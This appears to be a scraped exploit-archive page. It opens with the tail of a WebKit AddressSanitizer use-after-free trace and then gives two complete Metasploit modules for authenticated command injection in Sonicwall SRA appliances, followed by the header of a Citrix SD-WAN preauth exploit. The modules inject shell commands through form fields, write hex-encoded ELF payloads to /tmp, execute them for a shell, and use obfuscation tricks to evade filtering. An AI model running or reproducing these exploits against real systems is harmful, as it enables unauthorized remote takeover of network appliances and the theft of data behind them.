    #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)
    #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)
    #5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)
    #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)
    #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
    #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
    #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
    #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
    #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
    #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
    #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
    #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
    #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
    #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
    #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
    #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
    #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
    #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)
    #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)
    #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)
    #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)
    #24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)
    #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)
    #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)
    #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)
    #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)
    #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)

previously allocated by thread T0 here:
    #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
    #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
    #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
    #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
    #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
    #5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
    #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)
    #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)
    #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)
    #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)
    #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)
    #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)
    #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
    #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
    #14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)
    #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
    #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
    #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
    #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
    #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
    #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
    #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
    #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
    #23 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
    #24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
    #25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
    #26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
    #27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
    #28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
    #29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const
Shadow bytes around the buggy address:
  0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c1000012110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c1000012140: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
=>0x1c1000012150: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd
  0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c1000012170: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c1000012180: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c1000012190: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c10000121a0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==30692==ABORTING
-->
HireHackking 
# Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerablity 
# Date: 12/24/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.6-21sv
# Tested on: 8.1.0.2-14sv
#            
# CVE : (awaiting cve)

# vuln: viewcert.cgi / CERT parameter 

# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. 
#
# xort @ Critical Start




require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sonicwall SRA <= v8.1.0.2-14sv gencsr.cgi remote exploit',
					'Description'    => %q{
					This module exploits a remote command execution vulnerability in
				the Sonicwall SRA Appliance Version <=  v8.1.0.2-14sv. The vulnerability exist in
				a section of the machine's adminstrative infertface for performing configurations 
				related to on-connect scripts to be launched for users's connecting.	
			},
			'Author'         =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'none', 'none'],
				],
			'Platform'      => [ 'linux'],
			'Privileged'     => true,
			 'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                        'Privileged'     => false,

		        'Payload'        =>
                                { 
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },

			'Targets'        =>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('PASSWORD', [ false, 'Device password', "" ]),	
			         	OptString.new('USERNAME', [ true, 'Device password', "admin" ]),	
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

        def do_login(username, password_clear)
                vprint_status( "Logging into machine with credentials...\n" )

                # vars
                timeout = 1550;

                # send request  
                res = send_request_cgi(
                {
                      'method'  => 'POST',
                      'uri'     => "/cgi-bin/userLogin",
		      'headers' => {
			   'Connection' => 'close',
			   'Content-Type' => 'application/x-www-form-urlencoded',
			   'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
	              },
                      'vars_post' => {
			   'username' => username,
			   'password' => password_clear,
			   'domain' => 'LocalDomain',
			   'loginButton' => 'Login',
			   'state' => 'login',
			   'login' => 'true',
			   'VerifyCert' => '0',
			   'portalname' => 'VirtualOffice',
			   'ajax' => 'true'
		       },

                }, timeout)

		swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
		
                return swap
        end


	def run_command(swap_cookie, cmd)

                # vars
                timeout = 1550;

                res = send_request_cgi({
                   'method' => 'POST',
                   'uri'    => "/cgi-bin/gencsr",
                   'data' => "country=USA&san=ASDF&fqdn=www.google.com&county=dallas&applyButt=applyButt%3d&password=xxx&fullsan=xxx&organization=xxx&name=xxx&state=xxx&department=xxx&email=x@x.com&key_size=`#{cmd}`",
 
                   'headers' =>
                        {
                                'Cookie' => "swap=#{swap_cookie}",
                        },
                }, timeout)
	end

	def run_command_spliced(swap_cookie, cmd)

              write_mode = ">"
              dump_file = "/tmp/qq"
	      reqs = 0

              cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

              for cmd_chunk in cmd_encoded.split(/(..................................................)/)

                        cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
			reqs += 1

			vprint_status("Running Command (#{reqs})\n")

                        # set to normal append for loops after the first round
                        if write_mode == ">"
                                write_mode = ">>"
                        end

                        # add cmd to array to be exected later          
                        run_command(swap_cookie, cmd_new)
               end

                # execute payload stored at dump_file 
                run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")

	end

	def exploit
		# timeout
		timeout = 1550;

		# params
		password_clear = datastore['PASSWORD']
		user = datastore['USERNAME']

		# do authentication		
		swap_cookie = do_login(user, password_clear)
	
		vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
			
		 #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?

                        cmd = datastore['CMD']

                        # Encode cmd payload
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

                        # kill stale calls to bdump from previous exploit calls for re-use
                        run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))

                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

                        run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")

			# wait for magic
                        handler
                end
	end
end
HireHackking 
# Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity 
# Date: 12/25/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#             
# CVE : (awaiting cve)

# vuln1: importlogo.cgi / logo1 parameter (any contents can be uploaded)    
# vuln2: sitecustomization.cgi / portalname (filename) parameter   

# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. 
#
# xort @ Critical Start




require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sonicwall SRA <= v8.1.0.2-14sv remote exploit',
					'Description'    => %q{
					This module exploits a remote command execution vulnerability in
				the Sonicwall SRA Appliance Version <=  v8.1.0.2-14sv. The vulnerability exist in
				a section of the machine's adminstrative infertface for performing configurations 
				related to on-connect scripts to be launched for users's connecting.	
			},
			'Author'         =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'none', 'none'],
				],
			'Platform'      => [ 'linux'],
			'Privileged'     => true,
			 'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                        'Privileged'     => false,

		        'Payload'        =>
                                { 
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },

			'Targets'        =>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('PASSWORD', [ false, 'Device password', "" ]),	
			         	OptString.new('USERNAME', [ true, 'Device password', "admin" ]),	
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

        def do_login(username, password_clear)
                vprint_status( "Logging into machine with credentials...\n" )

                # vars
                timeout = 1550;

                # send request  
                res = send_request_cgi(
                {
                      'method'  => 'POST',
                      'uri'     => "/cgi-bin/userLogin",
		      'headers' => {
			   'Connection' => 'close',
			   'Content-Type' => 'application/x-www-form-urlencoded',
			   'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
	              },
                      'vars_post' => {
			   'username' => username,
			   'password' => password_clear,
			   'domain' => 'LocalDomain',
			   'loginButton' => 'Login',
			   'state' => 'login',
			   'login' => 'true',
			   'VerifyCert' => '0',
			   'portalname' => 'VirtualOffice',
			   'ajax' => 'true'
		       },
                }, timeout)

		swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
		
                return swap
        end

        def upload_payload(swap_cookie, file_data)
                vprint_status( "Upload Payload..." )

                # vars
                timeout = 1550;

                upload_req = [
                [ "portalName","VirtualOffice" ],
                [ "defaultLogo","0" ],
                [ "uiVersion","2" ],
                [ "bannerBackground", "light" ]
                ]

                boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
                post_data = ""

		# assemble upload_req parms
                upload_req.each do |xreq|
                    post_data << "--#{boundary}\r\n"
                    post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
                    post_data << "#{xreq[1]}\r\n"
                end

                # add malicious file
                post_data << "--#{boundary}\r\n"
                post_data << "Content-Disposition: form-data; name=\"logo1\"; filename=\"x.jpg\"\r\n"
		post_data << "Content-Type: image/jpeg\r\n\r\n"
                post_data << "#{file_data}\r\n"
 
		post_data << "--#{boundary}--\r\n"

                res = send_request_cgi({
                   'method' => 'POST',
                   'uri'    => "/cgi-bin/importlogo?uploadId=1",
                   'ctype'  => "multipart/form-data; boundary=#{boundary}",
                   'data'   => post_data,
                   'headers' =>
                        {
                                'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
				'Cookie' => 'swap='+swap_cookie+';',
                        }
                }, timeout)
                

        end


	def run_command(swap_cookie, cmd)

		vprint_status( "Running Command...\n" )

                # vars
                timeout = 1550;

		vprint_status("creating filename on target: #{cmd}\n")

                upload_req = [
                [ "portalname", cmd ],
                [ "portaltitle","Virtual Office" ],
                [ "bannertitle","Virtual Office" ],
                [ "bannermessage","<h1>Dell Sonicwall</h1>" ],
                [ "portalUrl","https://192.168.84.155/portal/xxx" ],
                [ "loginflag","on" ],
                [ "bannerflag","on" ],
                [ "httpOnlyCookieFlag","on" ],
                [ "cachecontrol","on" ],
                [ "uniqueness", "on" ],
                [ "duplicateLoginAction", "1" ],
                [ "livetilesmalllogo", "" ],
                [ "livetilemediumlogo", "" ],
                [ "livetilewidelogo", "" ],
                [ "livetilelargelogo", "" ],
                [ "livetilebackground", "#0085C3" ],
                [ "livetilename", "" ],
                [ "home2page", "on" ],
                [ "allowNetExtender", "on" ],
                [ "virtualpassagepage", "on" ],
                [ "cifsdirectpage", "on" ],
                [ "cifspage", "on" ],
                [ "cifsappletpage", "on" ],
                [ "cifsapplet", "on" ],
                [ "cifsdefaultfilesharepath", "" ],
                [ "home3page", "on" ],
                [ "showAllBookmarksTab", "on" ],
                [ "showDefaultTabs", "on" ],
                [ "showCopyright", "on" ],
                [ "showSidebar", "on" ],
                [ "showUserPortalHelpButton", "on" ],
                [ "userPortalHelpURL", "" ],
                [ "showUserPortalOptionsButton", "on" ],
                [ "homemessage", "<h1>Welcome to the Dell SonicWALL Virtual Office</h1>" ],
                [ "hptabletitle", "Virtual Office Bookmarks" ],
                [ "vhostName", "www.#{Rex::Text.rand_text_hex(32)}.com" ],
                [ "vhostAlias", "" ],
                [ "vhostInterface", "ALL" ],
                [ "vhostEnableKeepAlive", "on" ],
                [ "cdssodn", ".yahoo.com" ],
                [ "enableSSLForwardSecrecy", "0" ],
                [ "enableSSLProxyVerify", "0" ],
                [ "sslProxyProtocol", "0" ],
                [ "loginSchedule", "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" ],
                [ "formsection", "main" ],
                [ "doAdd", "1" ],
                [ "cgiaction", "1" ],
                [ "themename", "stylesonicwall" ],
                [ "onlinehelp", "" ],
                [ "tmp_currentVhostName", "" ],
                [ "tmp_currentVhostAlias", "" ],
                [ "tmp_currentVhostInterface", "ALL" ],
                [ "tmp_currentVhostIp", "" ],
                [ "tmp_currentVhostIPv6", "" ],
                [ "tmp_currentVhostEnableHTTP", "0" ],
                [ "tmp_currentVhostEnableKeepAlive", "1" ],
                [ "tmp_currentVhostCert", "" ],
                [ "tmp_currEnforceSSLProxyProtocol", "0" ],
                [ "tmp_currSSLProxyProtocol", "0" ],
                [ "tmp_currEnableSSLProxyVerify", "0" ],
                [ "tmp_currEnableSSLForwardSecrecy", "0" ],
                [ "tmp_currentVhostOffloadRewrite", "" ],
                [ "restartWS", "1" ],
                [ "reuseFavicon", "" ],
                [ "oldReuseFavicon", "" ],
                ]

                boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
                post_data = ""

                # assemble upload_req parms
                upload_req.each do |xreq|
                    post_data << "--#{boundary}\r\n"
                    post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
                    post_data << "#{xreq[1]}\r\n"
                end

                post_data << "--#{boundary}--\r\n"

                res = send_request_cgi({
                   'method' => 'POST',
                   'uri'    => "/cgi-bin/sitecustomization",
                   'ctype'  => "multipart/form-data; boundary=#{boundary}",
                   'data'   => post_data,
                   'headers' =>
                        {
                                'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
                                'Cookie' => 'swap='+swap_cookie+';',
                        }
                }, timeout)
	end

	def run_command_file(swap_cookie)

		# use prefix so exploit can be re-used (unique portalname requirment)
		prefix = Rex::Text.rand_text_numeric(5)

		run_command(swap_cookie, "#{prefix}$({find,$({perl,-e,'print(chr(0x2f))'}),-name,VirtualOffice.gif,-exec,cp,{},qz,$({perl,-e,'print(chr(0x3b))'})})")
		run_command(swap_cookie, "#{prefix}$({chmod,777,qz})")
		run_command(swap_cookie, "#{prefix}$({sh,-c,.$({perl,-e,'print(chr(0x2f))'})qz})")

	end

	def exploit
		# timeout
		timeout = 1550;

		# params
		password_clear = datastore['PASSWORD']
		user = datastore['USERNAME']

		# do authentication		
		swap_cookie = do_login(user, password_clear)
	
		vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
			
		# pause to let things run smoothly
		#sleep(5)

		 #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?

                        cmd = datastore['CMD']

                        # Encode cmd payload
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

                        # kill stale calls to bdump from previous exploit calls for re-use
                        upload_payload(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

			# upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        upload_payload(swap_cookie, ("#!/bin/bash\necho -e \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m; /tmp/m"))
                        run_command_file(swap_cookie)

			# wait for magic
                        handler
			
                end


	end
end
HireHackking 
# Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity 
# Date: 02/20/2017
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.citrix.com
# Software Link: https://www.citrix.com/downloads/cloudbridge/
# Version: 9.1.2.26.561201
# Tested on: 9.1.2.26.561201 (OS partition 4.6)
#            
# CVE : (awaiting cve)

# vuln: CGISESSID Cookie parameter
#  associated vuln urls:
#                       /global_data/ 
#			/global_data/headerdata 
#			/log
#			/
#			/r9-1-2-26-561201/configuration/ 
#			/r9-1-2-26-561201/configuration/edit 
#			/r9-1-2-26-561201/configuration/www.citrix.com [CGISESSID cookie]
#
